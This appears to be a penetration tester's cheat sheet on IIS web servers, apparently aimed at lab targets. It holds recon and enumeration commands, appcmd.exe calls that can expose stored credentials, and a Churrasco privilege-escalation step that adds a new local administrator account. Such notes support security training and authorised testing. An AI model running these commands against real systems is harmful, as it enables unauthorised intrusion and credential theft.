IIS
Ports #
- 4XXXX/tcp
Common Pages #
- Under construction
- 404
Headers #
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Recon #
# Nmap
nmap -p80 10.10.10.29 --script http-iis-webdav-vuln
# Other way of getting IIS version. You will see
# something like "Server: Microsoft-IIS/10.0"
curl -I http://10.10.10.29
# You can get the iisfinal.txt from hacktricks and
# feed it to gobuster.
curl https://firebasestorage.googleapis.com/v0/b/gitbook-28427.appspot.com/o/assets%2F-L_2uGJGU7AVNRcqRvEi%2F-L_YlVBGlH_l7w9zCtQO%2F-L_YlWYOMUA7fr799GvH%2Fiisfinal.txt?alt=media&token=de499b23-3599-45ce-ad7e-7800858b3dac -o iisfinal.txt
gobuster dir -u http://10.10.10.29 -w iisfinal.txt
Interesting Files #
# Constains sql connection strings, passwords and other
# sensitive data. This is similar to `.htaccess` in apache.
web.config
# index file
iisstart.htm
Logins #
- Brute force
# Nmap
nmap -p80 10.10.10.29 --script http-iis-short-name-brute
- Try to access some DLLs, they may expose some login page.
Downloads #
- 10.X - latest version as of November 2021
appcmd.exe #
# check if you have permissions
C:\Windows\system32\inetsrv\appcmd.exe list apppools
# may show credentials
C:\Windows\system32\inetsrv\appcmd.exe list vdir
Some Vulnerabilities #
# https://github.com/Re4son/Churrasco
c:\Inetpub>churrasco.exe -d "net user /add <username> <password>"
c:\Inetpub>churrasco.exe -d "net localgroup administrators <username> /add"